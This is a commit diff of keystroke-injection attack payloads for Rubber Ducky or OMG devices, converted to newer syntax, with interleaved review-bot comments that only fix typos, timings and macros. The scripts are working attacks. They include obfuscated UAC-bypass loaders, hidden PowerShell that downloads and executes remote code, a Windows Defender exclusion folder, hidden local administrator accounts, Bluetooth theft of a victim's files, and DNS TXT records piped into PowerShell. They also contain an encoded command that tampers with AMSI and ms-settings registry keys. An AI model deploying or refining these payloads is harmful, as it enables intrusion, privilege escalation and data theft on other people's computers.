STRINGLN powershell -w h -NoP -NonI -Exec Bypass iwr https://#URL?dl=1 -O $env:TMP\e.wav
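Review bot: the REM_BLOCK truncates the original sentence: "See Play-WAV.ps1 for more details" became "See Play-WAV.ps1 for more", and "Remeber" is still misspelled; since the header is being rewritten anyway, restore the word and fix the typo. "DEFINE #URL <Your Shared link for the intended file>" describes the value as a full shared link, yet the STRINGLN prefixes it with "https://", so a pasted Dropbox link yields "https://https://..."; either drop the prefix (as Shortcut-Jacker does) or reword the placeholder to "host and path without the scheme". The "replace ?dl=0 with ?dl=1" reminder is also stale now that "?dl=1" is hardcoded after the constant.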

View File

@ -1,25 +1,20 @@
REM Title: Safe-Haven REM_BLOCK
Title: Safe-Haven
Author: I am Jakoby
REM Author: I am Jakoby Description: This is a UAC bypass payload that will open an elevated powershell console
Next a Directory called "safe" will be generated in your Documents Directory
The "safe" directory will be added to the Window's Defender Exclusion list
The AntiVirus will ignore all files downloaded to or ran from here
REM Description: This is a UAC bypass payload that will open an elevated powershell console Target: Windows 10, 11
REM Next a Directory called "safe" will be generated in your Documents Directory END_REM
REM The "safe" directory will be added to the Window's Defender Exclusion list
REM The AntiVirus will ignore all files downloaded to or ran from here
REM Target: Windows 10, 11 DUCKY_LANG US
DELAY 2000
DELAY 500
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 1000 DELAY 1000
STRINGLN & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
STRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )
ENTER
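Review bot: the REM_BLOCK carries "Window's Defender Exclusion list" over from the old header; while the block is being rewritten, make it "Windows Defender exclusion list". Otherwise this is a clean STRING+ENTER to STRINGLN conversion with the initial "DELAY 500" raised to "DELAY 2000", consistent with the other payloads in the commit.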

View File

@ -1,15 +1,20 @@
REM Title: Shortcut-Jacker REM_BLOCK
Title: Shortcut-Jacker
Author: I am Jakoby
REM Author: I am Jakoby Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop Target: Windows 10, 11
REM Target: Windows 10, 11 Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <Your Shared link for the intended file>?dl=1; invoke-expression $pl STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #URL?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
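Review bot: the REM_BLOCK still tells the user to "replace the link" in the script and to change "?dl=0" to "?dl=1", but after this hunk the value lives in "DEFINE #URL" and "?dl=1" is appended in the STRINGLN; reword the note to say "set #URL to your shared link (without the ?dl= suffix)". Note the inconsistency with Credz-Plz and Play-WAV in this same commit, which put "https://" in front of "#URL"; this file does not, so the same pasted value behaves differently across the three payloads. Pick one convention and apply it to all.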

View File

@ -1,30 +1,31 @@
REM Title: UrAttaControl REM_BLOCK
Title: UrAttaControl
Author: I am Jakoby
REM Author: I am Jakoby Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.
Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script. Target: Windows 10, 11
REM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details
REM Target: Windows 10, 11 NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable
EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad
REM NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable You can use this function I wrote to convert your .ps1 sscripts to Base64
REM EXAMPLE: $Payload = "cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=" - This Base64 script will open notepad https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
END_REM
REM You can use this function I wrote to convert your .ps1 sscripts to Base64 DEFINE #URL "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"
REM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
DUCKY_LANG US
DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell STRINGLN powershell
ENTER
DELAY 1000 DELAY 1000
STRING $url = "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT" STRINGLN $url = #URL
SHIFT ENTER STRINGLN $Payload = (Invoke-WebRequest $url'?dl=1').Content
STRING $Payload = (Invoke-WebRequest $url'?dl=1').Content STRINGLN ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
SHIFT ENTER STRINGLN exit
STRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')
SHIFT ENTER
STRING exit
ENTER
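Review bot: The REM_BLOCK keeps the typos "Reaplce" and "sscripts" from the old REM lines, and its instruction to "Reaplce the URL down below" no longer points at anything specific now that the URL lives in `DEFINE #URL "YOUR-URL-WITH-BASE64-ENCODED-SCRIPT"`; say "replace the value of #URL" instead. Note also that this DEFINE value carries its own double quotes so that `STRINGLN $url = #URL` expands to a quoted string; that works, but it is the opposite convention from the other files in this commit, which define bare URLs, so a short comment would stop the next editor from "fixing" it.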

View File

@ -1,71 +1,36 @@
REM Title: Add_Local_Admin REM_BLOCK
REM Author: LulzAnarchyAnon Title: Add_Local_Admin
REM Description: Administrator PowerShell is opened, and a script Author: LulzAnarchyAnon
REM runs that adds a Local Admin User. Description: Administrator PowerShell is opened, and a script runs that adds a Local Admin User.
REM Target: Windows 10 PowerShell Target: Windows 10 PowerShell
REM Props: Darren Kitchen, and I am Jakoby Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0 Version: 1.0
REM Category: Execution Category: Execution
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
GUI x GUI x
DELAY 500 STRING a
a
DELAY 500
ALT y ALT y
Delay 2000
STRING $Username = "Admin2" STRINGLN $Username = "Admin2"
DELAY 2000 STRINGLN $Password = "password"
ENTER STRINGLN $group = "Administrators"
STRING $Password = "password" STRINGLN $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
DELAY 2000 STRINGLN $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
ENTER STRINGLN if ($existing -eq $null) {
STRING $group = "Administrators" STRINGLN Write-Host "Creating new local user $Username."
DELAY 2000 STRINGLN & NET USER $Username $Password /add /y /expires:never
ENTER STRINGLN Write-Host "Adding local user $Username to $group."
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME" STRINGLN & NET LOCALGROUP $group $Username /add
DELAY 5000 STRINGLN }
ENTER STRINGLN {
STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username } STRINGLN Write-Host "Setting password for existing local user $Username."
DELAY 5000 STRINGLN $existing.SetPassword($Password)
ENTER STRINGLN }
STRING if ($existing -eq $null) { STRINGLN Write-Host "Ensuring password for $Username never expires."
DELAY 2000 STRINGLN & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
ENTER STRINGLN exit
STRING Write-Host "Creating new local user $Username."
DELAY 5000
ENTER
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 5000
ENTER
STRING Write-Host "Adding local user $Username to $group."
DELAY 5000
ENTER
STRING & NET LOCALGROUP $group $Username /add
DELAY 5000
ENTER
STRING }
DELAY 2000
ENTER
STRING {
DELAY 2000
ENTER
STRING Write-Host "Setting password for existing local user $Username."
DELAY 5000
ENTER
STRING $existing.SetPassword($Password)
DELAY 2000
ENTER
STRING }
DELAY 2000
ENTER
STRING Write-Host "Ensuring password for $Username never expires."
DELAY 5000
ENTER
STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
DELAY 5000
ENTER
DELAY 1000
STRING exit
DELAY 100
ENTER
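Review bot: The 2000 ms wait after `ALT y` (the old `Delay 2000`) was removed and nothing replaced it, so `STRINGLN $Username = "Admin2"` is typed 500 ms (DEFAULT_DELAY) after the UAC prompt is answered, before the elevated PowerShell window is likely to have focus; keep an explicit `DELAY 2000` after `ALT y`. Pre-existing but worth fixing while here: there is no `else` between `STRINGLN }` and `STRINGLN {`, so the second block is a bare scriptblock literal that PowerShell prints rather than runs, and the "existing user" branch never executes.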

View File

@ -1,10 +1,14 @@
REM Title: Admin who never sleeps REM_BLOCK
REM Desc: Adds a local hidden admin user and sets power settings to never sleep. Title: Admin who never sleeps
REM Author: UberGuidoZ Desc: Adds a local hidden admin user and sets power settings to never sleep.
REM Target: Windows (local admin required) Author: UberGuidoZ
Target: Windows (local admin required)
END_REM
DUCKY_LANG US
DELAY 2000
REM Launch admin-level CMD prompt REM Launch admin-level CMD prompt
DELAY 3000
GUI r GUI r
DELAY 1000 DELAY 1000
STRING cmd STRING cmd
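Review bot: The `DELAY 3000` that followed the "Launch admin-level CMD prompt" comment was dropped while the new `DELAY 2000` sits before DUCKY_LANG, so the total wait before `GUI r` shrinks from 3000 ms to 2000 ms; probably harmless, but it is a timing change rather than a pure formatting one and should be mentioned in the commit message.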
@ -17,31 +21,25 @@ ENTER
DELAY 1500 DELAY 1500
REM Create local admin user WinSystem with pass Some-P@ssw0rd REM Create local admin user WinSystem with pass Some-P@ssw0rd
STRING net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add STRINGLN net user WinSystem Some-P@ssw0rd /add /fullname:"Windows System" /passwordchg:no && net localgroup administrators WinSystem /add
ENTER
DELAY 1500 DELAY 1500
REM Set WinSystem user pass to never expire, skip UAC, and hide the user REM Set WinSystem user pass to never expire, skip UAC, and hide the user
STRING wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0 STRINGLN wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v WinSystem /t REG_DWORD /d 0
ENTER
DELAY 1500 DELAY 1500
REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout) REM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)
STRING powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0 STRINGLN powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0
ENTER
DELAY 1000 DELAY 1000
STRING Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0 STRINGLN Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0
ENTER
DELAY 1000 DELAY 1000
STRING powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0 STRINGLN powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0
ENTER
DELAY 1000 DELAY 1000
REM Set monitor timeouts to avoid noticing system is awake REM Set monitor timeouts to avoid noticing system is awake
STRING powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10 STRINGLN powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10
ENTER
DELAY 1000 DELAY 1000
REM Exit and enjoy your user whenever! REM Exit and enjoy your user whenever!
EXIT STRINGLN exit
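Review bot: The `&&` chain on the `wmic useraccount ... set passwordexpires=false && REG ADD ... && REG ADD ...` line means that if `wmic` is missing (it has been removed from recent Windows 11 builds) or returns non-zero, neither REG ADD runs; if the three steps are meant to be independent, give each its own STRINGLN. Replacing the invalid `EXIT` keyword with `STRINGLN exit` is the right fix.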

View File

@ -1,41 +0,0 @@
REM Ai-Cable
REM Version 2.0
REM OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
REM Author: 0iphor13
REM This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
REM Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
DELAY 2000
REM Language only needed if you are not using an US layout
DUCKY_LANG de
MOUSE MOVE -10000 -10000
DELAY 200
MOUSE MOVE 200 200
DELAY 200
MOUSE CLICK 1
DELAY 200
CTRL a
DELAY 200
CTRL x
DELAY 200
STRING I will create the payload for you :)
DELAY 3000
CTRL a
DELAY 200
CTRL v
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
MOUSE MOVE -10000 -10000
DELAY 200
MOUSE MOVE 200 200
DELAY 200
ENTER
MOUSE CLICK 1
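Review bot: This whole-file removal is paired with the file re-added in the next hunk, which carries the same script; if the path changed, committing it as a rename preserves the file history, and if only the content changed, it should appear as a modification of the existing path rather than a delete plus add.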

View File

@ -0,0 +1,29 @@
REM_BLOCK
Ai-Cable
Version 2.0
OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
Author: 0iphor13
This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...
END_REM
DUCKY_LANG de
DELAY 2000
DEFAULT_DELAY 200
MOUSE MOVE -10000 -10000
MOUSE MOVE 200 200
MOUSE CLICK 1
CTRL a
CTRL x
STRING I will create the payload for you :)
DELAY 3000
CTRL a
CTRL v
DELAY 1000
REPEAT 3 TAB
MOUSE MOVE -10000 -10000
MOUSE MOVE 200 200
ENTER
MOUSE CLICK 1
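Review bot: The comment "Language only needed if you are not using an US layout" was dropped from the REM_BLOCK while `DUCKY_LANG de` is kept, so a reader with a US keyboard loses the hint that this line must be changed; put that remark back in the block. The `REPEAT 3 TAB` form is used consistently across the commit, so it is worth confirming once on the target firmware that `REPEAT n KEY` presses the key n times (the count here matches the three TAB lines it replaces).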

View File

@ -1,133 +1,62 @@
REM_BLOCK
Title: Blue_Harvester
Author: LulzAnarchyAnon
REM Title: Blue_Harvester READ BELOW BEFORE EXECUTING PAYLOAD...
REM Author: LulzAnarchyAnon Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened is selected followed by all of the files in the folder being selected, and added to the transfer cue.
The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
Afterwards the selected files are transfered to the attackers device via bluetooth.
I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
NOTE: Make sure your device is Discoverable...
The cursor coordinates x,y on the screen may vary depending on device...
A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or USB Rubber Ducky (YOUR CHOICE)
Target: Windows 10
Props: Darren Kitchen and I am Jakoby
Version: 1.0
Category: Execution
END_REM
DUCKY_LANG US
REM READ BELOW BEFORE EXECUTING PAYLOAD... DELAY 2000
DEFAULT_DELAY 500
REM Description: This is a Three stage payload that begins by opening bluetooth file transfer on the target device.
REM Next the attackers bluetooth adapter name is selected for pairing. In the second stage the last folder opened
REM is selected followed by all of the files in the folder being selected, and added to the transfer cue.
REM The Third, and final stage authticates, and allows pairing between the attacker, and the target device.
REM Afterwards the selected files are transfered to the attackers device via bluetooth.
REM I selected the pictures/camera roll folder as a default for this payload, but it can be changed.
REM Depending on both devices certain varibles will need to be adjusted in order for this payload to run correctly.
REM At the beginning of the Second stage "k" is for kali (adapter name) as it is the attacker device used for payload.
REM NOTE: Make sure your device is Discoverable...
REM The cursor coordinates x,y on the screen may vary depending on device...
REM A Pairing request will pop up, hit CONFIRM... A Pairing accept will pop up, hit CONFIRM
REM I'm uncertain at the moment if this payload is more favorable for deplotment on the OMG cables, or
REM USB Rubber Ducky (YOUR CHOICE)
REM Target: Windows 10
REM Props: Darren Kitchen and I am Jakoby
REM Version: 1.0
REM Category: Execution
REM STAGE 1 REM STAGE 1
GUI GUI
DELAY 50 STRINGLN fsquirt
STRING fsquirt
DELAY 200
ENTER
DELAY 500
SPACE SPACE
DELAY 500
REM STAGE 2 REM STAGE 2
k STRING k
DELAY 500
ENTER ENTER
DELAY 500
SPACE SPACE
DELAY 500 REPEAT 8 TAB
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER ENTER
DELAY 500
CTRL a CTRL a
DELAY 500
ENTER ENTER
DELAY 500
TAB TAB
DELAY 500
ENTER ENTER
REM STAGE 3 REM STAGE 3
GUI GUI
DELAY 50 STRINGLN powershell -windowstyle hidden
STRING powershell -windowstyle hidden STRINGLN Add-Type -AssemblyName System.Windows.Forms
DELAY 1000 STRINGLN $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
ENTER STRINGLN $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
DELAY 5000 STRINGLN [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
STRING Add-Type -AssemblyName System.Windows.Forms
DELAY 2000
ENTER
STRING $p1 = [System.Windows.Forms.Cursor]::Position.X = 1837
DELAY 2000
ENTER
STRING $p2 = [System.Windows.Forms.Cursor]::Position.Y = 1050
DELAY 2000
ENTER
DELAY 2000
STRING [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point($p1, $p2)
DELAY 2000
ENTER
DELAY 500
MOUSE CLICK 1 MOUSE CLICK 1
DELAY 1000
ENTER ENTER
DELAY 1000
TAB TAB
DELAY 1000
ENTER ENTER
DELAY 1000
ALT SPACE ALT SPACE
DELAY 500 REPEAT 6 DOWNARROW
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
DOWNARROW
DELAY 500
ENTER ENTER
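Review bot: Stage 3 lost its start-up wait: the old script waited 1000 ms before ENTER and 5000 ms after launching `powershell -windowstyle hidden`, while the new version types `STRINGLN Add-Type -AssemblyName System.Windows.Forms` 500 ms (DEFAULT_DELAY) after `STRINGLN powershell -windowstyle hidden`, which is rarely enough for a PowerShell console to come up; restore an explicit `DELAY 5000` after the launch line. The REM_BLOCK also still contains the typos "authticates", "varibles" and "deplotment" that this commit set out to fix.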

View File

@ -1,4 +1,4 @@
#----------------------------------------------------------------------------------------------------------- REM_BLOCK
# Title: Use a DNS TXT record to get the commands you want to execute instead of typing them in # Title: Use a DNS TXT record to get the commands you want to execute instead of typing them in
# Description: An example of how you could use DNS TXT records to get the powershell code you want to run. # Description: An example of how you could use DNS TXT records to get the powershell code you want to run.
# This POC will get some commands that will play a message on a victims computer using Windows # This POC will get some commands that will play a message on a victims computer using Windows
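Review bot: Now that the header is wrapped in REM_BLOCK ... END_REM, the leading `#` on every line inside it is redundant and mixes two comment conventions in one file; either strip the `#` prefixes or keep the original `#` header without the REM_BLOCK, but not both.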
@ -9,6 +9,7 @@
# Category: Execution # Category: Execution
# Target: Windows10+ Powershell # Target: Windows10+ Powershell
# Attackmodes: HID # Attackmodes: HID
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------
# Quick Guide # Quick Guide
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------
@ -37,12 +38,14 @@ for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------
# In OMG code that would be: # In OMG code that would be:
#----------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------
END_REM
DEFINE #URL omg.yourdomain.com
DUCKY_LANG US DUCKY_LANG US
DELAY 2000
GUI r GUI r
DELAY 1000 DELAY 1000
STRING CMD STRINGLN CMD
ENTER
DELAY 500 DELAY 500
STRING for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" omg.yourdomain.com 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command - STRINGLN for /f "tokens=* USEBACKQ" %a in (`nslookup "-q=txt" #OMG 2^>nul^|find /I """"`) do @echo|set /p="%~a"|powershell -Command -
ENTER
#-----------------------------------------------------------------------------------------------------------
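Review bot: The macro is declared as `DEFINE #URL omg.yourdomain.com` but the command line references `#OMG`, so no substitution happens and `nslookup "-q=txt" #OMG` is typed literally; change the STRINGLN to use `#URL` (or rename the DEFINE to `#OMG`). The trailing `#----` rule at the end of the old file is also removed, which is fine, but the matching rule above "In OMG code that would be:" is still inside the REM_BLOCK, so the separators no longer pair up.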

View File

@ -1,46 +1,7 @@
DELAY 500
DUCKY_LANG de DUCKY_LANG de
DELAY 1500 DELAY 2000
GUI r
DELAY 500
STRING powershell
DELAY 250
ENTER
STRING powershell.exe -enc JABQAD0AIgBjAG0AZAAuAGUAeABlACAALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAE4AZQB3AC0ASQB0AGUAbQAgAC GUI r
STRINGLN powershell
DELAY 200 DELAY 200
STRING cASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABBAE0AUwBJAFwAUAByAG8AdgBpAGQAZQByAHMAXAB7ADIA STRINGLN powershell.exe -enc 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;Start-Sleep -s 3;exit
DELAY 200
STRING NwA4ADEANwA2ADEARQAtADIAOABFADAALQA0ADEAMAA5AC0AOQA5AEYARQAtAEIAOQBEADEAMgA3AEMANQA3AEEARgBGAH0AJwAgAC0ARgBvAHIAYwBl
DELAY 200
STRING ADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8A
DELAY 200
STRING ZgB0AFwAQQBNAFMASQBcAFAAcgBvAHYAaQBkAGUAcgBzAFwAewAyADcAOAAxADcANgAxAEUALQAyADgARQAwAC0ANAAxADAAOQAtADkAOQBGAEUALQBC
DELAY 200
STRING ADkARAAxADIANwBDADUANwBBAEYARQB9ACcAIAAtAFIAZQBjAHUAcgBzAGUAOwAgAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABwAG8AdwBlAHIAcwBoAGUA
DELAY 200
STRING bABsACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAH
DELAY 200
STRING QAdABpAG4AZwBzAFwAJwAgAC0AUgBlAGMAdQByAHMAZQAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBz
DELAY 200
STRING AGgAZQBsAGwALgBlAHgAZQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA7AE4AZQB3AC0ASQB0AGUAbQAgACIASABLAEMAVQA6AFwAUwBvAGYAdA
DELAY 200
STRING B3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACI
DELAY 200
STRING AIAAtAEYAbwByAGMAZQA7ADsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3
DELAY 200
STRING AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIA
DELAY 200
STRING AtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIAIgAgAC0ARgBvAHIAYwBlADsAUwBlAHQAL
DELAY 200
STRING QBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcA
DELAY 200
STRING G0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiACgAZABlAGYAYQB
DELAY 200
STRING 1AGwAdAApACIAIAAtAFYAYQBsAHUAZQAgACQAUAAgAC0ARgBvAHIAYwBlADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABv
DELAY 200
STRING AHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASAB
DELAY 200
